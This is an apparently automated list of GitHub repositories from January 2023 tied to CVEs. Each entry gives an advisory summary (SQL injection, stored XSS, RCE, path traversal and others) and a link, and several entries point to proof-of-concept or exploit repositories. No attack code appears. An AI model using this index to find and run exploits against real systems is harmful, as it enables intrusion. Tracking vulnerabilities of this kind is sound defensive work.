**cve-2022-34169 延伸出的Jdk Xalan的payload自动生成工具,可根据不同的Jdk生成出其所对应的xslt文件** : [flowerwind/AutoGenerateXalanPayload](https://github.com/flowerwind/AutoGenerateXalanPayload) create time: 2023-01-17T03:48:11Z

**no description** : [NetJBS/CVE-2020-28478--PoC](https://github.com/NetJBS/CVE-2020-28478--PoC) create time: 2023-01-17T02:19:31Z

**Fuji Electric Tellus Lite V-Simulator versions 4.0.12.0 and prior are vulnerable to an out-of-bounds write which may allow an attacker to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3087](https://github.com/Live-Hack-CVE/CVE-2022-3087) create time: 2023-01-17T01:41:25Z

**This it's a PoC of Departament of justice VDP. By rootkit** : [NetJBS/CVE-2017-0055-PoC](https://github.com/NetJBS/CVE-2017-0055-PoC) create time: 2023-01-16T21:55:56Z

**A vulnerability was found in Little Apps Little Software Stats. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file inc/class.securelogin.php of the component Password Reset Handler. The manipulation leads to improper access controls. Upgrading to version 0.2 is able CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10057](https://github.com/Live-Hack-CVE/CVE-2015-10057) create time: 2023-01-16T21:14:13Z

**A vulnerability was found in 2071174A vinylmap. It has been classified as critical. Affected is the function contact of the file recordstoreapp/views.py. The manipulation leads to sql injection. The name of the patch is b07b79a1e92cc62574ba0492cce000ef4a7bd25f. It is recommended to apply a patch to fix this issue. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10056](https://github.com/Live-Hack-CVE/CVE-2015-10056) create time: 2023-01-16T21:14:08Z

**Trusted Firmware-A through 2.8 has an out-of-bounds read in the X.509 parser for parsing boot certificates. This affects downstream use of get_ext and auth_nvctr. Attackers might be able to trigger dangerous read side effects or obtain sensitive information about microarchitectural state. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47630](https://github.com/Live-Hack-CVE/CVE-2022-47630) create time: 2023-01-16T21:14:22Z

**A vulnerability was found in saemorris TheRadSystem. It has been classified as problematic. Affected is an unknown function of the file users.php. The manipulation of the argument q leads to cross site scripting. It is possible to launch the attack remotely. VDB-218454 is the identifier assigned to this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0327](https://github.com/Live-Hack-CVE/CVE-2023-0327) create time: 2023-01-16T21:14:17Z

**A vulnerability has been found in frontaccounting faplanet and classified as critical. This vulnerability affects unknown code. The manipulation leads to path traversal. The name of the patch is a5dcd87f46080a624b1a9ad4b0dd035bbd24ac50. It is recommended to apply a patch to fix this issue. VDB-218398 is the identifier CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125080](https://github.com/Live-Hack-CVE/CVE-2014-125080) create time: 2023-01-16T20:08:56Z

**A vulnerability was found in PictureThisWebServer and classified as critical. This issue affects the function router.post of the file routes/user.js. The manipulation of the argument username/password leads to sql injection. The name of the patch is 68b9dc346e88b494df00d88c7d058e96820e1479. It is recommended to apply a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10055](https://github.com/Live-Hack-CVE/CVE-2015-10055) create time: 2023-01-16T20:09:05Z

**A vulnerability, which was classified as critical, was found in githuis P2Manage. This affects the function Execute of the file PTwoManage/Database.cs. The manipulation of the argument sql leads to sql injection. The name of the patch is 717380aba80002414f82d93c770035198b7858cc. It is recommended to apply a patch to fi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10054](https://github.com/Live-Hack-CVE/CVE-2015-10054) create time: 2023-01-16T20:09:00Z

**The RSSImport WordPress plugin through 4.6.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4658](https://github.com/Live-Hack-CVE/CVE-2022-4658) create time: 2023-01-16T17:59:11Z

**The Welcart e-Commerce WordPress plugin before 2.8.9 does not validate and escapes one of its shortcode attributes, which could allow users with a role as low as a contributor to perform a Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4655](https://github.com/Live-Hack-CVE/CVE-2022-4655) create time: 2023-01-16T17:59:07Z

**The Greenshift WordPress plugin before 4.8.9 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4653](https://github.com/Live-Hack-CVE/CVE-2022-4653) create time: 2023-01-16T17:59:02Z

**The Real Testimonials WordPress plugin before 2.6.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as adm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4648](https://github.com/Live-Hack-CVE/CVE-2022-4648) create time: 2023-01-16T17:58:59Z

**The Video Conferencing with Zoom WordPress plugin before 4.0.10 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4578](https://github.com/Live-Hack-CVE/CVE-2022-4578) create time: 2023-01-16T17:58:54Z

**The Seriously Simple Podcasting WordPress plugin before 2.19.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4571](https://github.com/Live-Hack-CVE/CVE-2022-4571) create time: 2023-01-16T17:58:50Z

**The Tickera WordPress plugin before 3.5.1.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4549](https://github.com/Live-Hack-CVE/CVE-2022-4549) create time: 2023-01-16T17:58:46Z

**The Conditional Payment Methods for WooCommerce WordPress plugin through 1.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by [high privilege users such as admin|users with a role as low as admin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4547](https://github.com/Live-Hack-CVE/CVE-2022-4547) create time: 2023-01-16T17:58:41Z

**The MashShare WordPress plugin before 3.8.7 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4544](https://github.com/Live-Hack-CVE/CVE-2022-4544) create time: 2023-01-16T17:58:38Z

**The ConvertKit WordPress plugin before 2.0.5 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks, which could be used against high-privilege users such as admins CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4508](https://github.com/Live-Hack-CVE/CVE-2022-4508) create time: 2023-01-16T17:58:33Z

**The Real Cookie Banner WordPress plugin before 3.4.10 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks against logged-in admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4507](https://github.com/Live-Hack-CVE/CVE-2022-4507) create time: 2023-01-16T17:58:29Z

**The Easy Accordion WordPress plugin before 2.2.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4487](https://github.com/Live-Hack-CVE/CVE-2022-4487) create time: 2023-01-16T17:58:25Z

**The Meteor Slides WordPress plugin through 1.5.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4486](https://github.com/Live-Hack-CVE/CVE-2022-4486) create time: 2023-01-16T17:58:21Z

**The Social Share, Social Login and Social Comments Plugin WordPress plugin before 7.13.44 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used ag CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4484](https://github.com/Live-Hack-CVE/CVE-2022-4484) create time: 2023-01-16T17:58:17Z

**The Insert Pages WordPress plugin before 3.7.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4483](https://github.com/Live-Hack-CVE/CVE-2022-4483) create time: 2023-01-16T17:58:13Z

**The Carousel, Slider, Gallery by WP Carousel WordPress plugin before 2.5.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high priv CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4482](https://github.com/Live-Hack-CVE/CVE-2022-4482) create time: 2023-01-16T17:58:08Z

**The Mesmerize Companion WordPress plugin before 1.6.135 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4481](https://github.com/Live-Hack-CVE/CVE-2022-4481) create time: 2023-01-16T17:58:05Z

**The Click to Chat WordPress plugin before 3.18.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4480](https://github.com/Live-Hack-CVE/CVE-2022-4480) create time: 2023-01-16T17:58:00Z

**The Font Awesome WordPress plugin before 4.3.2 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks against logged-in admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4478](https://github.com/Live-Hack-CVE/CVE-2022-4478) create time: 2023-01-16T17:57:55Z

**The Smash Balloon Social Post Feed WordPress plugin before 4.1.6 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks against logged-in admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4477](https://github.com/Live-Hack-CVE/CVE-2022-4477) create time: 2023-01-16T17:57:51Z

**The Download Manager WordPress plugin before 3.2.62 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks against logged-in admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4476](https://github.com/Live-Hack-CVE/CVE-2022-4476) create time: 2023-01-16T17:57:46Z

**The Simple Membership WordPress plugin before 4.2.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as adm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4469](https://github.com/Live-Hack-CVE/CVE-2022-4469) create time: 2023-01-16T17:57:42Z

**Themify Portfolio Post WordPress plugin before 1.2.1 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks, which could be used against high privileged users such CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4464](https://github.com/Live-Hack-CVE/CVE-2022-4464) create time: 2023-01-16T17:57:37Z

**The 3D FlipBook WordPress plugin through 1.13.2 does not validate or escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks against high privilege users like administrators. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4453](https://github.com/Live-Hack-CVE/CVE-2022-4453) create time: 2023-01-16T17:57:32Z

**The MonsterInsights WordPress plugin before 8.9.1 does not sanitize or escape page titles in the top posts/pages section, allowing an unauthenticated attacker to inject arbitrary web scripts into the titles by spoofing requests to google analytics. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3904](https://github.com/Live-Hack-CVE/CVE-2022-3904) create time: 2023-01-16T17:57:28Z

**no description** : [iliass-dahman/CVE-2022-22963-POC](https://github.com/iliass-dahman/CVE-2022-22963-POC) create time: 2023-01-15T21:39:20Z

**A vulnerability was found in msmania poodim. It has been declared as critical. This vulnerability affects unknown code of the component Command Line Argument Handler. The manipulation leads to stack-based buffer overflow. The attack can be initiated remotely. The name of the patch is 6340d5d2c81e55e61522c4b40a6cdd5c397 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-10005](https://github.com/Live-Hack-CVE/CVE-2010-10005) create time: 2023-01-16T13:33:11Z

**A vulnerability, which was classified as critical, was found in antonbolling clan7ups. Affected is an unknown function of the component Login/Session. The manipulation leads to sql injection. The name of the patch is 25afad571c488291033958d845830ba0a1710764. It is recommended to apply a patch to fix this issue. The ide CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-10012](https://github.com/Live-Hack-CVE/CVE-2013-10012) create time: 2023-01-16T13:33:15Z

**A vulnerability classified as critical has been found in prodigasistemas curupira up to 0.1.3. Affected is an unknown function of the file app/controllers/curupira/passwords_controller.rb. The manipulation leads to sql injection. Upgrading to version 0.1.4 is able to address this issue. The name of the patch is 93a9a77 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10053](https://github.com/Live-Hack-CVE/CVE-2015-10053) create time: 2023-01-16T13:32:58Z

**A vulnerability was found in liftkit database up to 2.13.1. It has been classified as critical. This affects the function processOrderBy of the file src/Query/Query.php. The manipulation leads to sql injection. Upgrading to version 2.13.2 is able to address this issue. The name of the patch is 42ec8f2b22e0b0b98fb5b4444 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15020](https://github.com/Live-Hack-CVE/CVE-2016-15020) create time: 2023-01-16T13:33:19Z

**A vulnerability classified as critical was found in Events Extension. Affected by this vulnerability is the function getRandomFeaturedEventByDate/getUpcomingFeaturedEventsInCategoriesWithSubcategories/recacheEvent/searchResults of the file classes/events.php. The manipulation leads to sql injection. The name of the pat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25076](https://github.com/Live-Hack-CVE/CVE-2018-25076) create time: 2023-01-16T13:33:02Z

**A vulnerability was found in NethServer phonenehome. It has been rated as critical. This issue affects the function get_info/get_country_coor of the file server/index.php. The manipulation leads to sql injection. The name of the patch is 759c30b0ddd7d493836bbdf695cf71624b377391. It is recommended to apply a patch to fi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4313](https://github.com/Live-Hack-CVE/CVE-2021-4313) create time: 2023-01-16T13:33:07Z

**When explicitly enabling the feature flag DASHBOARD_CACHE (disabled by default), the system allowed for an unauthenticated user to access dashboard configuration metadata using a REST API Get endpoint. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45438](https://github.com/Live-Hack-CVE/CVE-2022-45438) create time: 2023-01-16T13:33:49Z

**An authenticated attacker with update datasets permission could change a dataset link to an untrusted site, users could be redirected to this site when clicking on that specific dataset. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43721](https://github.com/Live-Hack-CVE/CVE-2022-43721) create time: 2023-01-16T13:33:45Z

**An authenticated attacker with write CSS template permissions can create a record with specific HTML tags that will not get properly escaped by the toast message displayed when a user deletes that specific CSS template record. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43720](https://github.com/Live-Hack-CVE/CVE-2022-43720) create time: 2023-01-16T13:33:40Z

**Two legacy REST API endpoints for approval and request access are vulnerable to cross site request forgery. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43719](https://github.com/Live-Hack-CVE/CVE-2022-43719) create time: 2023-01-16T13:33:37Z

**Upload data forms do not correctly render user input leading to possible XSS attack vectors that can be performed by authenticated users with database connection update permissions. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43718](https://github.com/Live-Hack-CVE/CVE-2022-43718) create time: 2023-01-16T13:33:32Z

**Dashboard rendering does not sufficiently sanitize the content of markdown components leading to possible XSS attack vectors that can be performed by authenticated users with create dashboard permissions. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43717](https://github.com/Live-Hack-CVE/CVE-2022-43717) create time: 2023-01-16T13:33:29Z

**A vulnerability in the SQL Alchemy connector of Apache Superset allows an authenticated user with read access to a specific database to add subqueries to the WHERE and HAVING fields referencing tables on the same database that the user should not have access to, despite the user having the feature flag "ALLOW_ADHOC_SUB CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41703](https://github.com/Live-Hack-CVE/CVE-2022-41703) create time: 2023-01-16T13:33:24Z

**CVE-2022-27499** : [StanPlatinum/snapshot-demo](https://github.com/StanPlatinum/snapshot-demo) create time: 2022-01-07T03:45:41Z

**In multiple versions of HIMA PC based Software an unquoted Windows search path vulnerability might allow local users to gain privileges via a malicious .exe file and gain full access to the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4258](https://github.com/Live-Hack-CVE/CVE-2022-4258) create time: 2023-01-16T11:19:19Z

**RCE POC for CVE-2022-46169** : [N1arut/CVE-2022-46169_POC](https://github.com/N1arut/CVE-2022-46169_POC) create time: 2023-01-16T10:21:26Z

**no description** : [wh-gov/CVE-2022-46463](https://github.com/wh-gov/CVE-2022-46463) create time: 2023-01-16T07:10:13Z

**Cacti: Unauthenticated Remote Code Execution Exploit in Ruby** : [hab1b0x/CVE-2022-46169](https://github.com/hab1b0x/CVE-2022-46169) create time: 2023-01-15T22:46:52Z

**Path Traversal: '\..\filename' in GitHub repository froxlor/froxlor prior to 2.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0316](https://github.com/Live-Hack-CVE/CVE-2023-0316) create time: 2023-01-16T06:58:58Z

**Command Injection in GitHub repository froxlor/froxlor prior to 2.0.8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0315](https://github.com/Live-Hack-CVE/CVE-2023-0315) create time: 2023-01-16T06:58:54Z

**no description** : [pmihsan/OverlayFS-CVE-2021-3493](https://github.com/pmihsan/OverlayFS-CVE-2021-3493) create time: 2023-01-16T04:29:39Z

**CVE-2022-23529-PoC** : [aalex954/CVE-2022-23529-PoC](https://github.com/aalex954/CVE-2022-23529-PoC) create time: 2023-01-16T02:35:54Z

**Cross-site Scripting (XSS) - Reflected in GitHub repository thorsten/phpmyfaq prior to 3.1.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0314](https://github.com/Live-Hack-CVE/CVE-2023-0314) create time: 2023-01-16T00:18:17Z

**Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0313](https://github.com/Live-Hack-CVE/CVE-2023-0313) create time: 2023-01-16T00:18:13Z

**Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0312](https://github.com/Live-Hack-CVE/CVE-2023-0312) create time: 2023-01-16T00:18:09Z

**Improper Authentication in GitHub repository thorsten/phpmyfaq prior to 3.1.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0311](https://github.com/Live-Hack-CVE/CVE-2023-0311) create time: 2023-01-16T00:18:04Z

**Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0310](https://github.com/Live-Hack-CVE/CVE-2023-0310) create time: 2023-01-16T00:18:00Z

**Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0309](https://github.com/Live-Hack-CVE/CVE-2023-0309) create time: 2023-01-16T00:17:56Z

**Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0308](https://github.com/Live-Hack-CVE/CVE-2023-0308) create time: 2023-01-16T00:17:52Z

**Weak Password Requirements in GitHub repository thorsten/phpmyfaq prior to 3.1.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0307](https://github.com/Live-Hack-CVE/CVE-2023-0307) create time: 2023-01-16T00:17:48Z

**Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0306](https://github.com/Live-Hack-CVE/CVE-2023-0306) create time: 2023-01-16T00:17:43Z

**Windows Installer Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21542](https://github.com/Live-Hack-CVE/CVE-2023-21542) create time: 2023-01-16T00:17:40Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, was found in calesanz gibb-modul-151. This affects the function bearbeiten/login. The manipulation leads to open redirect. It is possible to initiate the attack remotely. The name of the patch is 88a517 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10052](https://github.com/Live-Hack-CVE/CVE-2015-10052) create time: 2023-01-15T22:04:47Z

**A vulnerability was found in tombh jekbox. It has been rated as problematic. This issue affects some unknown processing of the file lib/server.rb. The manipulation leads to exposure of information through directory listing. The attack may be initiated remotely. The name of the patch is 64eb2677671018fc08b96718b81e3dbc8 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15019](https://github.com/Live-Hack-CVE/CVE-2016-15019) create time: 2023-01-15T22:04:55Z

**A vulnerability was found in krail-jpa up to 0.9.1. It has been classified as critical. This affects an unknown part. The manipulation leads to sql injection. Upgrading to version 0.9.2 is able to address this issue. The name of the patch is c1e848665492e21ef6cc9be443205e36b9a1f6be. It is recommended to upgrade the aff CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15018](https://github.com/Live-Hack-CVE/CVE-2016-15018) create time: 2023-01-15T22:04:51Z

**A vulnerability classified as critical has been found in karsany OBridge up to 1.3. Affected is the function getAllStandaloneProcedureAndFunction of the file obridge-main/src/main/java/org/obridge/dao/ProcedureDao.java. The manipulation leads to sql injection. Upgrading to version 1.4 is able to address this issue. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25075](https://github.com/Live-Hack-CVE/CVE-2018-25075) create time: 2023-01-15T22:04:40Z

**A vulnerability, which was classified as critical, has been found in bony2023 Discussion-Board. Affected by this issue is the function display_all_replies of the file functions/main.php. The manipulation of the argument str leads to sql injection. The name of the patch is 26439bc4c63632d63ba89ebc0f149b25a9010361. It is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10051](https://github.com/Live-Hack-CVE/CVE-2015-10051) create time: 2023-01-15T19:51:48Z

**A vulnerability was found in brandonfire miRNA_Database_by_PHP_MySql. It has been declared as critical. This vulnerability affects the function __construct/select_single_rna/count_rna of the file inc/model.php. The manipulation leads to sql injection. The name of the patch is 307c5d510841e6142ddcbbdbb93d0e8a0dc3fd6a. I CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10050](https://github.com/Live-Hack-CVE/CVE-2015-10050) create time: 2023-01-15T19:51:44Z

**A vulnerability was found in Overdrive Eletrônica course-builder up to 1.7.x and classified as problematic. Affected by this issue is some unknown functionality of the file coursebuilder/modules/oeditor/oeditor.html. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to versi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10049](https://github.com/Live-Hack-CVE/CVE-2015-10049) create time: 2023-01-15T19:51:40Z

**no description** : [cbk914/CVE-2022-26134_check](https://github.com/cbk914/CVE-2022-26134_check) create time: 2023-01-15T20:11:27Z

**no description** : [cbk914/CVE-2022-30525_check](https://github.com/cbk914/CVE-2022-30525_check) create time: 2023-01-15T20:02:24Z

**A vulnerability classified as critical was found in SourceCodester Online Food Ordering System. This vulnerability affects unknown code of the file admin_class.php of the component Login Module. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0305](https://github.com/Live-Hack-CVE/CVE-2023-0305) create time: 2023-01-15T13:16:52Z

**A vulnerability classified as critical has been found in SourceCodester Online Food Ordering System. This affects an unknown part of the file admin_class.php of the component Signup Module. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has bee CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0304](https://github.com/Live-Hack-CVE/CVE-2023-0304) create time: 2023-01-15T13:16:47Z

**A vulnerability was found in SourceCodester Online Food Ordering System. It has been rated as critical. Affected by this issue is some unknown functionality of the file view_prod.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0303](https://github.com/Live-Hack-CVE/CVE-2023-0303) create time: 2023-01-15T13:16:43Z

**A vulnerability was found in agy pontifex.http. It has been declared as critical. This vulnerability affects unknown code of the file lib/Http.coffee. The manipulation leads to sql injection. Upgrading to version 0.1.0 is able to address this issue. The name of the patch is e52a758f96861dcef2dabfecb9da191bb2e07761. It CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125079](https://github.com/Live-Hack-CVE/CVE-2014-125079) create time: 2023-01-15T12:10:16Z

**A vulnerability was found in yanheven console and classified as problematic. Affected by this issue is some unknown functionality of the file horizon/static/horizon/js/horizon.instances.js. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is 32a7b713468161282f2e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125078](https://github.com/Live-Hack-CVE/CVE-2014-125078) create time: 2023-01-15T12:10:12Z

**A vulnerability, which was classified as critical, has been found in pointhi searx_stats. This issue affects some unknown processing of the file cgi/cron.php. The manipulation leads to sql injection. The name of the patch is 281bd679a4474ddb222d16c1c380f252839cc18f. It is recommended to apply a patch to fix this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125077](https://github.com/Live-Hack-CVE/CVE-2014-125077) create time: 2023-01-15T12:10:08Z

**A vulnerability was found in bmattoso desafio_buzz_woody. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The name of the patch is cb8220cbae06082c969b1776fcb2fdafb3a1006b. It is recommended to apply a patch to fix this issue. The identifier VDB-218357 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10048](https://github.com/Live-Hack-CVE/CVE-2015-10048) create time: 2023-01-15T12:10:04Z

**A vulnerability was found in KYUUBl school-register. It has been classified as critical. This affects an unknown part of the file src/DBManager.java. The manipulation leads to sql injection. The name of the patch is 1cf7e01b878aee923f2b22cc2535c71a680e4c30. It is recommended to apply a patch to fix this issue. The asso CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10047](https://github.com/Live-Hack-CVE/CVE-2015-10047) create time: 2023-01-15T12:09:59Z

**A vulnerability has been found in lolfeedback and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection. The name of the patch is 6cf0b5f2228cd8765f734badd37910051000f2b2. It is recommended to apply a patch to fix this issue. The identifier VDB-21835 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10046](https://github.com/Live-Hack-CVE/CVE-2015-10046) create time: 2023-01-15T12:09:55Z

**A vulnerability, which was classified as critical, was found in tutrantta project_todolist. Affected is the function getAffectedRows/where/insert/update in the library library/Database.php. The manipulation leads to sql injection. The name of the patch is 194a0411bbe11aa4813f13c66b9e8ea403539141. It is recommended to a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10045](https://github.com/Live-Hack-CVE/CVE-2015-10045) create time: 2023-01-15T12:09:51Z

**A vulnerability classified as critical was found in gophergala sqldump. This vulnerability affects unknown code. The manipulation leads to sql injection. The name of the patch is 76db54e9073b5248b8863e71a63d66a32d567d21. It is recommended to apply a patch to fix this issue. VDB-218350 is the identifier assigned to this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10044](https://github.com/Live-Hack-CVE/CVE-2015-10044) create time: 2023-01-15T12:09:47Z

**A vulnerability classified as critical was found in visegripped Stracker. Affected by this vulnerability is the function getHistory of the file doc_root/public_html/stracker/api.php. The manipulation of the argument symbol/startDate/endDate leads to sql injection. The name of the patch is 63e1b040373ee5b6c7d1e165ecf5ae CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4889](https://github.com/Live-Hack-CVE/CVE-2022-4889) create time: 2023-01-15T12:10:20Z

**BlueCat Device Registration Portal 2.2 allows XXE attacks that exfiltrate single-line files. A single-line file might contain credentials, such as "machine example.com login daniel password qwerty" in the documentation example for the .netrc file format. NOTE; 2.x versions are no longer supported. There is no available CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23595](https://github.com/Live-Hack-CVE/CVE-2023-23595) create time: 2023-01-15T12:10:25Z

